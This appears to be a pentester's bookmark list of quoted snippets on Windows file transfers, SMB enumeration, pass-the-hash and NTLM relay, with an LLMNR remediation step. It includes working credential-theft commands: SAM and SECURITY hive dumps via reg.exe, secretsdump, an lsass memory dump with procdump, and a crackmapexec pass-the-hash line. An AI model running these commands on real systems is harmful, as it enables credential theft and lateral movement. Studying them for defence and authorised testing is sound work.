https://academy.hackthebox.com/course/preview/file-transfers/windows-file-transfer-methods
PowerShell DownloadFile Method
We can specify the class name Net.WebClient and the method DownloadFile with the parameters corresponding to the URL of the target file to download and the output file name.
File Download
PowerShell DownloadString – Fileless Method
As we previously discussed,…
https://book.hacktricks.xyz/network-services-pentesting/pentesting-smb
https://github.com/ShawnDEvans/smbmap
For a recursive listing use -R; with -p, the hash “NT:LM” can be used in place of the password.
https://infosecwriteups.com/abusing-ntlm-relay-and-pass-the-hash-for-admin-d24d0f12bea0
Remediation
Disabling LLMNR
Open the Group Policy Editor in your version of Windows
Navigate to Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client
Under DNS Client, make sure that “Turn OFF Multicast Name…
https://www.n00py.io/2020/12/alternative-ways-to-pass-the-hash-pth/
Crackmapexec
cme smb 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79 -d domain.local
SMB 10.0.0.20 445 PC01 [*] Windows Server 2012 R2 Standard 9600 x64 (name:PC01) (domain:domain.local) (signing:False) (SMBv1:True)
SMB 10.0.0.20…
https://pure.security/dumping-windows-credentials/
Registry
C:> reg.exe save hklm\sam c:\temp\sam.save
C:> reg.exe save hklm\security c:\temp\security.save
C:> reg.exe save hklm\system c:\temp\system.save
Password Hashes (Impacket)
$ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
Credentials in memory (Procdump)
C:> procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1
C:> mimikatz.exe…
Ref: https://meriemlarouim.medium.com/credentials-in-windows-and-how-to-dump-them-remotely-b5c315bb76f4
Example of an LM hash: aad3b435b51404eeaad3b435b51404ee
PS: “aad3b435b51404eeaad3b435b51404ee” is the Null hash.
https://bitvijays.github.io/LFC-VulnerableMachines.html#ctf-series-vulnerable-machines
Official page: https://owtf.github.io/
Installation (Docker recommended): https://owtf.readthedocs.io/en/develop/installation/methods.html#docker
Getting started (Authentication): https://owtf.readthedocs.io/en/develop/usage/authentication.html